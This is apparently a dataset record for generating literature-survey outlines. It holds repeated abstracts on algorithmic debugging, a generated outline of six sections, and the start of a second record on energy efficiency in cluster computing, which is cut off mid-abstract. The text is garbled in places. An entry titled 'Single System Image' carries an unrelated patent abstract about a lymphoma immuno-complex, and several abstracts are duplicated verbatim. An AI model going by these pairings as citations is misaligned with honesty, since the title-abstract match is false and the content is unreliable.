--- paper_title: Algorithmic Program Debugging paper_content: The thesis lays a theoretical framework for program debugging, with the goal of partly mechanizing this activity. In particular, we formalize and develop algorithmic solutions to the following two questions: (1) How do we identify a bug in a program that behaves incorrectly? (2) How do we fix a bug, once one is identified? ::: We develop interactive diagnosis algorithms that identify a bug in a program that behaves incorrectly, and implement them in Prolog for the diagnosis of Prolog programs. Their performance suggests that they can be the backbone of debugging aids that go far beyond what is offered by current programming environments. ::: We develop an inductive inference algorithm that synthesizes logic programs from examples of their behavior. The algorithm incorporates the diagnosis algorithms as a component. It is incremental, and progresses by debugging a program with respect to the examples. The Model Inference System is a Prolog implementation of the algorithm. Its range of applications and efficiency is comparable to existing systems for program synthesis from examples and grammatical inference. ::: We develop an algorithm that can fix a bug that has been identified, and integrate it with the diagnosis algorithms to form an interactive debugging system. By restricting the class of bugs we attempt to correct, the system can debug programs that are too complex for the Model Inference System to synthesize. --- paper_title: Algorithmic Program Debugging paper_content: The thesis lays a theoretical framework for program debugging, with the goal of partly mechanizing this activity. In particular, we formalize and develop algorithmic solutions to the following two questions: (1) How do we identify a bug in a program that behaves incorrectly? (2) How do we fix a bug, once one is identified? ::: We develop interactive diagnosis algorithms that identify a bug in a program that behaves incorrectly, and implement them in Prolog for the diagnosis of Prolog programs. Their performance suggests that they can be the backbone of debugging aids that go far beyond what is offered by current programming environments. ::: We develop an inductive inference algorithm that synthesizes logic programs from examples of their behavior. The algorithm incorporates the diagnosis algorithms as a component. It is incremental, and progresses by debugging a program with respect to the examples. The Model Inference System is a Prolog implementation of the algorithm. Its range of applications and efficiency is comparable to existing systems for program synthesis from examples and grammatical inference. ::: We develop an algorithm that can fix a bug that has been identified, and integrate it with the diagnosis algorithms to form an interactive debugging system. By restricting the class of bugs we attempt to correct, the system can debug programs that are too complex for the Model Inference System to synthesize. --- paper_title: Generalized algorithmic debugging and testing paper_content: This paper presents a method for semi-automatic bug localization, generalized algorithmic debugging, which has been integrated with the category partition method for functional testing. In this way the efficiency of the algorithmic debugging method for bug localization can be improved by using test specifications and test results. The long-range goal of this work is a semi-automatic debugging and testing system which can be used during large-scale program development of nontrivial programs. The method is generally applicable to procedural languages and is not dependent on any ad hoc assumptions regarding the subject program. The original form of algorithmic debugging, introduced by Shapiro, was however limited to small Prolog programs without side-effects, but has later been generalized to concurrent logic programming languages. Another drawback of the original method is the large number of interactions with the user during bug localization. To our knowledge, this is the first method which uses category partition testing to improve the bug localization properties of algorithmic debugging. The method can avoid irrelevant questions to the programmer by categorizing input parameters and then match these against test cases in the test database. Additionally, we use program slicing, a data flow analysis technique, to dynamically compute which parts of the program are relevant for the search, thus further improving bug localization. We believe that this is the first generalization of algorithmic debugging for programs with side-effects written in imperative languages such as Pascal. These improvements together makes it more feasible to debug larger programs. However, additional improvements are needed to make it handle pointer-related side-effects and concurrent Pascal programs. A prototype generalized algorithmic debugger for a Pascal subset without pointer side-effects and a test case generator for application programs in Pascal, C, dBase, and LOTUS have been implemented. --- paper_title: Declarative debugging for lazy functional languages paper_content: Lazy functional languages are declarative and allow the programmer to write programs where operational issues such as the evaluation order are left implicit. It is desirable to maintain a declarative view also during debugging so as to avoid burdening the programmer with operational details, for example concerning the actual evaluation order which tends to be difficult to follow. Conventional debugging techniques focus on the operational behaviour of a program and thus do not constitute a suitable foundation for a general-purpose debugger for lazy functional languages. Yet, the only readily available, general-purpose debugging tools for this class of languages are simple, operational tracers.This thesis presents a technique for debugging lazy functional programs declaratively and an efficient implementation of a declarative debugger for a large subset of Haskell. As far as we know, this is the first implementation of such a debugger which is sufficiently efficient to be useful in practice. Our approach is to construct a declarative trace which hides the operational details, and then use this as the input to a declarative (in our case algorithmic) debugger.The main contributions of this thesis are:A basis for declarative debugging of lazy functional programs is developed in the form of a trace which hides operational details. We call this kind of trace the Evaluation Dependence Tree (EDT).We show how to construct EDTs efficiently in the context of implementations of lazy functional languages based on graph reduction. Our implementation shows that the time penalty for tracing is modest, and that the space cost can be kept below a user definable limit by storing one portion of the EDT at a time.Techniques for reducing the size of the EDT are developed based on declaring modules to be trusted and designating certain functions as starting-points for tracing.We show how to support source-level debugging within our framework. A large subset of Haskell is handled, including list comprehensions.Language implementations are discussed from a debugging perspective, in particular what kind of support a debugger needs from the compiler and the run-time system.We present a working reference implementation consisting of a compiler for a large subset of Haskell and an algorithmic debugger. The compiler generates fairly good code, also when a program is compiled for debugging, and the resource consumption during debugging is modest. The system thus demonstrates the feasibility of our approach. --- paper_title: Algorithmic Program Debugging paper_content: The thesis lays a theoretical framework for program debugging, with the goal of partly mechanizing this activity. In particular, we formalize and develop algorithmic solutions to the following two questions: (1) How do we identify a bug in a program that behaves incorrectly? (2) How do we fix a bug, once one is identified? ::: We develop interactive diagnosis algorithms that identify a bug in a program that behaves incorrectly, and implement them in Prolog for the diagnosis of Prolog programs. Their performance suggests that they can be the backbone of debugging aids that go far beyond what is offered by current programming environments. ::: We develop an inductive inference algorithm that synthesizes logic programs from examples of their behavior. The algorithm incorporates the diagnosis algorithms as a component. It is incremental, and progresses by debugging a program with respect to the examples. The Model Inference System is a Prolog implementation of the algorithm. Its range of applications and efficiency is comparable to existing systems for program synthesis from examples and grammatical inference. ::: We develop an algorithm that can fix a bug that has been identified, and integrate it with the diagnosis algorithms to form an interactive debugging system. By restricting the class of bugs we attempt to correct, the system can debug programs that are too complex for the Model Inference System to synthesize. --- paper_title: GIDTS: a graphical programming environment for Prolog paper_content: This paper puts forward the Graphical Interactive Diagnosing, Testing and Slicing System (GIDTS) which is a graphical programming environment for PROLOG programs. The IDTSpart of the system integrates Shapiro's Interactive Diagnosis Algorithm with the Category Partition Testing Method (CPM) and a slicing technique performing the algorithmic debugging and functional testing of PROLOG programs. The integration of IDTS with a graphical user interface (GUI) supports the whole functionality of IDTS and provides a user-friendly environment giving the user more information on the state of the debugging process. GIDTS extends IDTS to a complete programming environment. It allows one to handle the debugging of complex programs using the extended syntax and semantics of PROLOG in a very flexible way. A static code diagnosis has also been implemented. In addition GIDTS supports debugging-directed editing of the source program, and a quick source code navigation via any of the tools (for example: the debugger, the static call graph and the information retriever). All these features are supported by the graphical user interface. --- paper_title: Hat-Delta — One Right Does Make a Wrong paper_content: We outline two methods for locating bugs in a program. This is done by comparing computations of the same program with different input. At least one of these computations must produce a correct result, while exactly one must exhibit some erroneous behaviour. Firstly reductions that are thought highly likely to be correct are eliminated from the search for the bug. Secondly, a program slicing technique is used to identify areas of code that are likely to be correct. Both methods have been implemented. In combination with algorithmic debugging they provide a system that quickly and accurately identifies bugs. --- paper_title: Algorithmic Program Debugging paper_content: The thesis lays a theoretical framework for program debugging, with the goal of partly mechanizing this activity. In particular, we formalize and develop algorithmic solutions to the following two questions: (1) How do we identify a bug in a program that behaves incorrectly? (2) How do we fix a bug, once one is identified? ::: We develop interactive diagnosis algorithms that identify a bug in a program that behaves incorrectly, and implement them in Prolog for the diagnosis of Prolog programs. Their performance suggests that they can be the backbone of debugging aids that go far beyond what is offered by current programming environments. ::: We develop an inductive inference algorithm that synthesizes logic programs from examples of their behavior. The algorithm incorporates the diagnosis algorithms as a component. It is incremental, and progresses by debugging a program with respect to the examples. The Model Inference System is a Prolog implementation of the algorithm. Its range of applications and efficiency is comparable to existing systems for program synthesis from examples and grammatical inference. ::: We develop an algorithm that can fix a bug that has been identified, and integrate it with the diagnosis algorithms to form an interactive debugging system. By restricting the class of bugs we attempt to correct, the system can debug programs that are too complex for the Model Inference System to synthesize. --- paper_title: Multiple-View Tracing for Haskell: a New Hat paper_content: Different tracing systems for Haskell give different views of a program at work. In practice, several views are complementary and can productively be used together. Until now each system has generated its own trace, containing only the information needed for its particular view. Here we present the design of a trace that can serve several views. The trace is generated and written to file as the computation proceeds. We have implemented both the generation of the trace and several different viewers. --- paper_title: Hat-Delta — One Right Does Make a Wrong paper_content: We outline two methods for locating bugs in a program. This is done by comparing computations of the same program with different input. At least one of these computations must produce a correct result, while exactly one must exhibit some erroneous behaviour. Firstly reductions that are thought highly likely to be correct are eliminated from the search for the bug. Secondly, a program slicing technique is used to identify areas of code that are likely to be correct. Both methods have been implemented. In combination with algorithmic debugging they provide a system that quickly and accurately identifies bugs. --- paper_title: A Generalised Query Minimisation for Program Debugging paper_content: Shapiro proposed an algorithm called ‘Divide-and-Query’ which gives a good solution for query minimisation in the context of algorithmic program debugging. His algorithm applies a half-splitting strategy which repeatedly subdivides an AND-tree representing an incorrect computation under the guidance of an oracle until the bug responsible has been localised. His aim was to minimise the number of queries asked of the oracle, and in general his method approximates well to this ideal. There are cases, however, in which it divides the tree suboptimally with the consequence that more queries are posed than are necessary. --- paper_title: Hat-Delta — One Right Does Make a Wrong paper_content: We outline two methods for locating bugs in a program. This is done by comparing computations of the same program with different input. At least one of these computations must produce a correct result, while exactly one must exhibit some erroneous behaviour. Firstly reductions that are thought highly likely to be correct are eliminated from the search for the bug. Secondly, a program slicing technique is used to identify areas of code that are likely to be correct. Both methods have been implemented. In combination with algorithmic debugging they provide a system that quickly and accurately identifies bugs. --- paper_title: Combining algorithmic debugging and program slicing paper_content: Currently, program slicing and algorithmic debugging are two of the most relevant debugging techniques for declarative languages. They help programmers to find bugs in a semiautomatic manner. On the one hand, program slicing is a technique to extract those program fragments that (potentially) affect the values computed at some point of interest. On the other hand, algorithmic debugging is able to locate a bug by automatically generating a series of questions and processing the programmer's answers. In this work, we show for functional languages how the combination of both techniques produces a more powerful debugging schema that reduces the number of questions that programmers must answer to locate a bug --- paper_title: Generalized algorithmic debugging and testing paper_content: This paper presents a method for semi-automatic bug localization, generalized algorithmic debugging, which has been integrated with the category partition method for functional testing. In this way the efficiency of the algorithmic debugging method for bug localization can be improved by using test specifications and test results. The long-range goal of this work is a semi-automatic debugging and testing system which can be used during large-scale program development of nontrivial programs. The method is generally applicable to procedural languages and is not dependent on any ad hoc assumptions regarding the subject program. The original form of algorithmic debugging, introduced by Shapiro, was however limited to small Prolog programs without side-effects, but has later been generalized to concurrent logic programming languages. Another drawback of the original method is the large number of interactions with the user during bug localization. To our knowledge, this is the first method which uses category partition testing to improve the bug localization properties of algorithmic debugging. The method can avoid irrelevant questions to the programmer by categorizing input parameters and then match these against test cases in the test database. Additionally, we use program slicing, a data flow analysis technique, to dynamically compute which parts of the program are relevant for the search, thus further improving bug localization. We believe that this is the first generalization of algorithmic debugging for programs with side-effects written in imperative languages such as Pascal. These improvements together makes it more feasible to debug larger programs. However, additional improvements are needed to make it handle pointer-related side-effects and concurrent Pascal programs. A prototype generalized algorithmic debugger for a Pascal subset without pointer side-effects and a test case generator for application programs in Pascal, C, dBase, and LOTUS have been implemented. --- paper_title: Combining algorithmic debugging and program slicing paper_content: Currently, program slicing and algorithmic debugging are two of the most relevant debugging techniques for declarative languages. They help programmers to find bugs in a semiautomatic manner. On the one hand, program slicing is a technique to extract those program fragments that (potentially) affect the values computed at some point of interest. On the other hand, algorithmic debugging is able to locate a bug by automatically generating a series of questions and processing the programmer's answers. In this work, we show for functional languages how the combination of both techniques produces a more powerful debugging schema that reduces the number of questions that programmers must answer to locate a bug --- paper_title: Hat-Delta — One Right Does Make a Wrong paper_content: We outline two methods for locating bugs in a program. This is done by comparing computations of the same program with different input. At least one of these computations must produce a correct result, while exactly one must exhibit some erroneous behaviour. Firstly reductions that are thought highly likely to be correct are eliminated from the search for the bug. Secondly, a program slicing technique is used to identify areas of code that are likely to be correct. Both methods have been implemented. In combination with algorithmic debugging they provide a system that quickly and accurately identifies bugs. --- paper_title: An algorithmic debugger for Java paper_content: This work presents DDJ, an algorithmic debugger for Java. The main advantage of DDJ with respect to previous algorithmic debuggers is its scalability. DDJ has a new architecture based on the use of cache memories that allows it to scale both in time and memory. In addition, it includes new techniques that allow the debugger to start the debugging session even before the execution tree has been produced. We present the new architecture, and describe the main features of this debugger together with a usage scenario. ---
``` Title: A Survey on Algorithmic Debugging Strategies Section 1: Introduction Description 1: This section introduces the concept of algorithmic debugging, its historical context, and provides an overview of the paper. It briefly reviews the evolution of algorithmic debugging and sets the stage for the detailed discussion of search strategies. Section 2: Algorithmic Debugging Description 2: This section explains the methodology of algorithmic debugging, including its architecture, the construction of the execution tree (ET), and the process of isolating buggy code through programmer questions. Section 3: Search Strategies for Algorithmic Debugging Description 3: This section delves into various search strategies used in algorithmic debugging. It describes and compares each strategy, detailed with examples and their implications on debugging performance. Section 4: A Comparison of Search Strategies Description 4: This section provides a comparative analysis of the discussed search strategies. It evaluates the efficiency and effectiveness of each strategy based on several metrics and practical scenarios. Section 5: Empirical Evaluation of Algorithmic Debugging Strategies Description 5: This section presents the results of empirical evaluations conducted to measure the performance of different algorithmic debugging strategies. It discusses the benchmarks used, experimental setup, and findings. Section 6: Conclusions and Future Work Description 6: This section summarizes the key findings of the survey, discusses the implications of the comparative analysis, and suggests potential directions for future research in algorithmic debugging strategies. ```
An overview of energy efficiency techniques in cluster computing systems
9
--- paper_title: The Green500 List: Encouraging Sustainable Supercomputing paper_content: The performance-at-any-cost design mentality ignores supercomputers' excessive power consumption and need for heat dissipation and will ultimately limit their performance. Without fundamental change in the design of supercomputing systems, the performance advances common over the past two decades won't continue. The HPC community needs a Green500 List to rank supercomputers on speed and power requirements and to supplement the TOP500 List. Vendors and system architects worldwide take substantial pride and invest tremendous effort toward making the biannual TOP500 List. We anticipate that the Green500 List effort will do the same and encourage the HPC community and operators of Internet data centers to design more power-efficient supercomputers and large-scale data centers. --- paper_title: High Performance Cluster Computing: Architectures and Systems paper_content: From the Publisher: ::: Rapid improvements in network and processor performance are revolutionizing high performance computing, transforming clustered commodity workstations into the supercomputing solution of choice. This book brings together contributions from more than 100 leading practitioners, offering a single source for up-to-the-minute information on virtually every key system-related issue in high performance cluster computing. ::: The book contains expert coverage of "commodity supercomputing" systems and architectures; Internet-based wide area "metacomputing" systems; the role of Java; new applications and algorithms; advanced techniques for enhancing availability and throughput, and much more. --- paper_title: Performance-constrained Distributed DVS Scheduling for Scientific Applications on Power-aware Clusters paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. High-performance, power-aware distributed computing reduces power and energy consumption of distributed applications and systems without sacrificing performance. Generally, we use DVS (Dynamic Voltage Scaling) technology now available in high-performance microprocessors to reduce power consumption during parallel application runs when peak CPU performance is not necessary due to load imbalance, communication delays, etc. We propose distributed performance-directed DVS scheduling strategies for use in scalable power-aware HPC clusters. By varying scheduling granularity we can obtain significant energy savings without increasing execution time (36% for FT from NAS PB). We created a software framework to implement and evaluate our various techniques and show performance-directed scheduling consistently saves more energy (nearly 25% for several codes) than comparable approaches with less impact on execution time (< 5%). Additionally, we illustrate the use of energy-delay products to automatically select distributed DVS schedules that meet users' needs. --- paper_title: High-performance, power-aware distributed computing for scientific applications paper_content: The PowerPack framework enables distributed systems to profile, analyze, and conserve energy in scientific applications using dynamic voltage scaling. For one common benchmark, the framework achieves more than 30 percent energy savings with minimal performance impact. --- paper_title: Power Aware Scheduling of Bag-of-Tasks Applications with Deadline Constraints on DVS-enabled Clusters paper_content: Power-aware scheduling problem has been a recent issue in cluster systems not only for operational cost due to electricity cost, but also for system reliability. As recent commodity processors support multiple operating points under various supply voltage levels, Dynamic Voltage Scaling (DVS) scheduling algorithms can reduce power consumption by controlling appropriate voltage levels. In this paper, we provide power-aware scheduling algorithms for bag-of-tasks applications with deadline constraints on DVS-enabled cluster systems in order to minimize power consumption as well as to meet the deadlines specified by application users. A bag-of-tasks application should finish all the sub-tasks before the deadline, so that the DVS scheduling scheme should consider the deadline as well. We provide the DVS scheduling algorithms for both time-shared and space-shared resource sharing policies. The simulation results show that the proposed algorithms reduce much power consumption compared to static voltage schemes. --- paper_title: Making cluster applications energy-aware paper_content: Power consumption has become a critical issue in large scale clusters. Existing solutions for addressing the servers' energy consumption suggest "shrinking" the set of active machines, at least until the more power-proportional hardware devices become available. This paper demonstrates that leveraging the sleeping state, however, may lead to unacceptably poor performance and low data availability if the distributed services are not aware of the power management's actions. Therefore, we present an architecture for cluster services in which the deployed services overcome this problem by actively participating in any action taken by the power management. We propose, implement, and evaluate modifications for the Hadoop Distributed File System and the MapReduce clone that make them capable of operating efficiently under limited power budgets. --- paper_title: A taxonomy of market-based resource management systems for utility-driven cluster computing paper_content: In utility-driven cluster computing, cluster Resource Management Systems (RMSs) need to know the specific needs of different users in order to allocate resources according to their needs. This in turn is vital to achieve service-oriented Grid computing that harnesses resources distributed worldwide based on users' objectives. Recently, numerous market-based RMSs have been proposed to make use of real-world market concepts and behavior to assign resources to users for various computing platforms. The aim of this paper is to develop a taxonomy that characterizes and classifies how market-based RMSs can support utility-driven cluster computing in practice. The taxonomy is then mapped to existing market-based RMSs designed for both cluster and other computing platforms to survey current research developments and identify outstanding issues. Copyright © 2006 John Wiley & Sons, Ltd. --- paper_title: A Taxonomy and Survey of Energy-Efficient Data Centers and Cloud Computing Systems paper_content: Abstract Traditionally, the development of computing systems has been focused on performance improvements driven by the demand of applications from consumer, scientific, and business domains. However, the ever-increasing energy consumption of computing systems has started to limit further performance growth due to overwhelming electricity bills and carbon dioxide footprints. Therefore, the goal of the computer system design has been shifted to power and energy efficiency. To identify open challenges in the area and facilitate future advancements, it is essential to synthesize and classify the research on power- and energy-efficient design conducted to date. In this study, we discuss causes and problems of high power/energy consumption, and present a taxonomy of energy-efficient design of computing systems covering the hardware, operating system, virtualization, and data center levels. We survey various key works in the area and map them onto our taxonomy to guide future design and development efforts. This chapter concludes with a discussion on advancements identified in energy-efficient computing and our vision for future research directions. --- paper_title: Single System Image paper_content: PCT No. PCT/US93/09895 Sec. 371 Date Apr. 14, 1995 Sec. 102(e) Date Apr. 14, 1995 PCT Filed Oct. 14, 1993 PCT Pub. No. WO94/08601 PCT Pub. Date Apr. 28, 1994B cell lymphoma tumor-associated antigen or a fragment thereof containing an epitope are linked to an immune-enhancing cytokine, such as GM-CSF, IL-2, or IL-4 to form an immuno-complex. This immuno-complex elicits immune responses which are protective with respect to tumor proliferation. The linkers may be simple chemical bifunctional moieties introduced through chemical synthetic techniques or peptides introduce through recombinant methodologies. Antibodies immunoreactive with these immunocomplexes are also useful as passive vaccines and as analytical tools. --- paper_title: Improvement of power-performance efficiency for high-end computing paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. Recent work has shown application characteristics of single-processor, memory-bound non-interactive codes and distributed, interactive Web services can be exploited to conserve power and energy with minimal performance impact. Our novel approach is to exploit parallel performance inefficiencies characteristic of non-interactive, distributed scientific applications, conserving energy using DVS (dynamic voltage scaling) without impacting time-to-solution (ITS) significantly, reducing cost and improving reliability. We present a software framework to analyze and optimize distributed power-performance using DVS implemented on a 16-node Centrino-based cluster. Using various DVS strategies we achieve application-dependent overall system energy savings as large as 25% with as little as 2% performance impact. --- paper_title: Determining the Minimum Energy Consumption using Dynamic Voltage and Frequency Scaling paper_content: While improving raw performance is of primary interest to most users of high-performance computers, energy consumption also is a critical concern. Some microprocessors allow voltage and frequency scaling, which enables a system to reduce CPU power and performance when the CPU is not on the critical path. When properly directed, such dynamic voltage and frequency scaling can produce significant energy savings with little performance penalty. Various DVFS scaling algorithms have been proposed. However, the benefit is application-dependent. We cannot see if they achieve the energy consumption as minimum as possible. So, it is important to establish the baseline of the DVFS scheduling for any application. This paper determines minimum energy consumption in voltage and frequency scaling systems for a given time delay. We assume we have a set of fixed points where scaling can occur. A brute-force solution is intractable even for a moderately sized set (although all programs presented in this paper can be solved with the brute-force). Our algorithm efficiently chooses the exact optimal schedule satisfying the given time constraint by estimation. Besides, our time and energy estimations from the optimal schedule have reasonable accuracy with 1.48% of differences at maximum. --- paper_title: High-Density Computing: A 240-Processor Beowulf in One Cubic Meter paper_content: We present results from computations on Green Destiny, a 240-processor Beowulf cluster which is contained entirely within a single 19-inch wide 42U rack. The cluster consists of 240 Transmeta TM5600 667-MHz CPUs mounted on RLX Technologies motherboard blades. The blades are mounted side-by-side in an RLX 3U rack-mount chassis, which holds 24 blades. The overall cluster contains 10 chassis and associated Fast and Gigabit Ethernet switches. The system has a footprint of 0.5 meter 2 (6 square feet), a volume of 0.85 meter 3 (30 cubic feet) and a measured power dissipation under load of 5200 watts (including network switches). We have measured the performance of the cluster using a gravitational treecode N-body simulation of galaxy formation using 200 million particles, which sustained an average of 38.9 Gflops on 212 nodes of the system. We also present results from a three-dimensional hydrodynamic simulation of a core-collapse supernova. --- paper_title: Performance-constrained Distributed DVS Scheduling for Scientific Applications on Power-aware Clusters paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. High-performance, power-aware distributed computing reduces power and energy consumption of distributed applications and systems without sacrificing performance. Generally, we use DVS (Dynamic Voltage Scaling) technology now available in high-performance microprocessors to reduce power consumption during parallel application runs when peak CPU performance is not necessary due to load imbalance, communication delays, etc. We propose distributed performance-directed DVS scheduling strategies for use in scalable power-aware HPC clusters. By varying scheduling granularity we can obtain significant energy savings without increasing execution time (36% for FT from NAS PB). We created a software framework to implement and evaluate our various techniques and show performance-directed scheduling consistently saves more energy (nearly 25% for several codes) than comparable approaches with less impact on execution time (< 5%). Additionally, we illustrate the use of energy-delay products to automatically select distributed DVS schedules that meet users' needs. --- paper_title: State of the Art of Power Saving in Clusters and Results from the EDF Case Study paper_content: Energy management for mobile devices has been traditionally a well studied topic during the last two decades, as these devices usually do not have a permanent connection to the power grid and thus solely rely on the limited battery charge. However, this trend has been mostly disregarded in the context of HPC systems as the main focus mainly relied on improving the performance at any cost. Therefore, energy costs for operating and cooling the equipment of current data centers have increased significantly up to a point where they are able to surpass the hardware acquisition costs. In this work we survey the current energy conservation efforts in distributed systems. Hence, we start our work with the introduction of the basic principles of power and energy management. This involves the distinguishing between the two often misleading terms power and energy management. Furthermore, we present several approaches on how to measure the power consumption at system and component level. Moreover, in order to get a deeper understanding on where the most of the power is spent within a server, we take a closer look at its components (i.e. CPU, RAM, etc.) and outline the currently available energy-saving mechanisms. Given that energy consumption strongly depends on the workload characteristics we also discuss the different types of workloads (i.e. mobile, commercial and scientific). Afterwards, we continue with the current approaches for energy savings in distributed systems by focusing on both node and cluster-level efforts. Finally, we finish this survey with an outline of some open challenges and the introduction of the EcoGrappe project. Thereby, we detail its objectives and present some of the work done at our project partner EDF. --- paper_title: Energy-efficient cluster computing with FAWN: Workloads and implications paper_content: This paper presents the architecture and motivation for a cluster-based, many-core computing architecture for energy-efficient, data-intensive computing. FAWN, a Fast Array of Wimpy Nodes, consists of a large number of slower but efficient nodes coupled with low-power storage. We present the computing trends that motivate a FAWN-like approach, for CPU, memory, and storage. We follow with a set of microbenchmarks to explore under what workloads these "wimpy nodes" perform well (or perform poorly). We conclude with an outline of the longer-term implications of FAWN that lead us to select a tightly integrated stacked chip-and-memory architecture for future FAWN development. --- paper_title: Memory-miser: a performance-constrained runtime system for power-scalable clusters paper_content: Main memory in clusters may dominate total system power. The resulting energy consumption increases system operating cost and the heat produced reduces reliability. Emergent memory technology will provide servers with the ability to dynamically turn-on (online) and turn-off (offline) memory devices at runtime. This technology, coupled with slack in memory demand, offers the potential for significant energy savings in clusters of servers. Enabling power-aware memory and conserving energy in clusters are non-trivial. First, power-aware memory techniques must be scalable to thousands of devices. Second, techniques must not negatively impact the performance of parallel scientific applications. Third, techniques must be transparent to the user to be practical. We propose a Memory Management Infra-Structure for Energy Reduction (Memory MISER). Memory MISER is transparent, performance-neutral, and scalable. It consists of a prototype Linux kernel that manages memory at device granularity and a userspace daemon that monitors memory demand systemically to control devices and implement energy- and performance-constrained policies. Experiments on an 8-node cluster show our control daemon reduces memory energy up to 56.8% with --- paper_title: FAWN: a fast array of wimpy nodes paper_content: This paper presents a new cluster architecture for low-power data-intensive computing. FAWN couples low-power embedded CPUs to small amounts of local flash storage, and balances computation and I/O capabilities to enable efficient, massively parallel access to data. The key contributions of this paper are the principles of the FAWN architecture and the design and implementation of FAWN-KV--a consistent, replicated, highly available, and high-performance key-value storage system built on a FAWN prototype. Our design centers around purely log-structured datastores that provide the basis for high performance on flash storage, as well as for replication and consistency obtained using chain replication on a consistent hashing ring. Our evaluation demonstrates that FAWN clusters can handle roughly 350 key-value queries per Joule of energy--two orders of magnitude more than a disk-based system. --- paper_title: A Feasibility Analysis of Power Awareness in Commodity-Based High-Performance Clusters paper_content: We present a feasibility study of a power-reduction scheme that reduces the thermal power of processors by lowering frequency and voltage in the context of high-performance computing. The study revolves around a 16-processor Opteron-based Beowulf cluster, configured as four nodes of quad-processors, and shows that one can easily reduce a significant amount of CPU and system power dissipation and its associated energy costs while still maintaining high performance. Specifically, our study shows that a 5% performance slowdown can be traded off for an average of 19% system energy savings and 24% system power reduction. These preliminary empirical results, via real measurements, are encouraging because hardware failures often occur when the cluster is running hot, i.e, when the workload is heavy, and the new power-reduction scheme can effectively reduce a cluster's power demands during these busy periods --- paper_title: Gordon: using flash memory to build fast, power-efficient clusters for data-intensive applications paper_content: As our society becomes more information-driven, we have begun to amass data at an astounding and accelerating rate. At the same time, power concerns have made it difficult to bring the necessary processing power to bear on querying, processing, and understanding this data. We describe Gordon, a system architecture for data-centric applications that combines low-power processors, flash memory, and data-centric programming systems to improve performance for data-centric applications while reducing power consumption. The paper presents an exhaustive analysis of the design space of Gordon systems, focusing on the trade-offs between power, energy, and performance that Gordon must make. It analyzes the impact of flash-storage and the Gordon architecture on the performance and power efficiency of data-centric applications. It also describes a novel flash translation layer tailored to data intensive workloads and large flash storage arrays. Our data show that, using technologies available in the near future, Gordon systems can out-perform disk-based clusters by 1.5× and deliver up to 2.5× more performance per Watt. --- paper_title: Dynamic cluster reconfiguration for power and performance paper_content: In this chapter we address power conservation for clusters of workstations or PCs. Our approach is to develop systems that dynamically turn cluster nodes on - to be able to handle the load imposed on the system efficiently - and off - to save power under lighter load. The key component of our systems is an algorithm that makes cluster reconfiguration decisions by considering the total load imposed on the system and the power and performance implications of changing the current configuration. The algorithm is implemented in two common cluster-based systems: a network server and an operating system for clustered cycle servers. Our experimental results are very favorable, showing that our systems conserve both power and energy in comparison to traditional systems. --- paper_title: Load Balancing and Unbalancing for Power and Performance in Cluster-Based Systems paper_content: In this paper we address power conservation for clusters of workstations or PCs. Our approach is to develop systems that dynamically turn cluster nodes on – to be able to handle the load imposed on the system efficiently – and off – to save power under lighter load. The key component of our systems is an algorithm that makes load balancing and unbalancing decisions by considering both the total load imposed on the cluster and the power and performance implications of turning nodes off. The algorithm is implemented in two different ways: (1) at the application level for a cluster-based, localityconscious network server; and (2) at the operating system level for an operating system for clustered cycle servers. Our experimental results are very favorable, showing that our systems conserve both power and energy in comparison to traditional systems. --- paper_title: A Taxonomy and Survey of Energy-Efficient Data Centers and Cloud Computing Systems paper_content: Abstract Traditionally, the development of computing systems has been focused on performance improvements driven by the demand of applications from consumer, scientific, and business domains. However, the ever-increasing energy consumption of computing systems has started to limit further performance growth due to overwhelming electricity bills and carbon dioxide footprints. Therefore, the goal of the computer system design has been shifted to power and energy efficiency. To identify open challenges in the area and facilitate future advancements, it is essential to synthesize and classify the research on power- and energy-efficient design conducted to date. In this study, we discuss causes and problems of high power/energy consumption, and present a taxonomy of energy-efficient design of computing systems covering the hardware, operating system, virtualization, and data center levels. We survey various key works in the area and map them onto our taxonomy to guide future design and development efforts. This chapter concludes with a discussion on advancements identified in energy-efficient computing and our vision for future research directions. --- paper_title: Improvement of power-performance efficiency for high-end computing paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. Recent work has shown application characteristics of single-processor, memory-bound non-interactive codes and distributed, interactive Web services can be exploited to conserve power and energy with minimal performance impact. Our novel approach is to exploit parallel performance inefficiencies characteristic of non-interactive, distributed scientific applications, conserving energy using DVS (dynamic voltage scaling) without impacting time-to-solution (ITS) significantly, reducing cost and improving reliability. We present a software framework to analyze and optimize distributed power-performance using DVS implemented on a 16-node Centrino-based cluster. Using various DVS strategies we achieve application-dependent overall system energy savings as large as 25% with as little as 2% performance impact. --- paper_title: Performance-constrained Distributed DVS Scheduling for Scientific Applications on Power-aware Clusters paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. High-performance, power-aware distributed computing reduces power and energy consumption of distributed applications and systems without sacrificing performance. Generally, we use DVS (Dynamic Voltage Scaling) technology now available in high-performance microprocessors to reduce power consumption during parallel application runs when peak CPU performance is not necessary due to load imbalance, communication delays, etc. We propose distributed performance-directed DVS scheduling strategies for use in scalable power-aware HPC clusters. By varying scheduling granularity we can obtain significant energy savings without increasing execution time (36% for FT from NAS PB). We created a software framework to implement and evaluate our various techniques and show performance-directed scheduling consistently saves more energy (nearly 25% for several codes) than comparable approaches with less impact on execution time (< 5%). Additionally, we illustrate the use of energy-delay products to automatically select distributed DVS schedules that meet users' needs. --- paper_title: Memory-miser: a performance-constrained runtime system for power-scalable clusters paper_content: Main memory in clusters may dominate total system power. The resulting energy consumption increases system operating cost and the heat produced reduces reliability. Emergent memory technology will provide servers with the ability to dynamically turn-on (online) and turn-off (offline) memory devices at runtime. This technology, coupled with slack in memory demand, offers the potential for significant energy savings in clusters of servers. Enabling power-aware memory and conserving energy in clusters are non-trivial. First, power-aware memory techniques must be scalable to thousands of devices. Second, techniques must not negatively impact the performance of parallel scientific applications. Third, techniques must be transparent to the user to be practical. We propose a Memory Management Infra-Structure for Energy Reduction (Memory MISER). Memory MISER is transparent, performance-neutral, and scalable. It consists of a prototype Linux kernel that manages memory at device granularity and a userspace daemon that monitors memory demand systemically to control devices and implement energy- and performance-constrained policies. Experiments on an 8-node cluster show our control daemon reduces memory energy up to 56.8% with --- paper_title: Automatic performance setting for dynamic voltage scaling paper_content: The emphasis on processors that are both low power 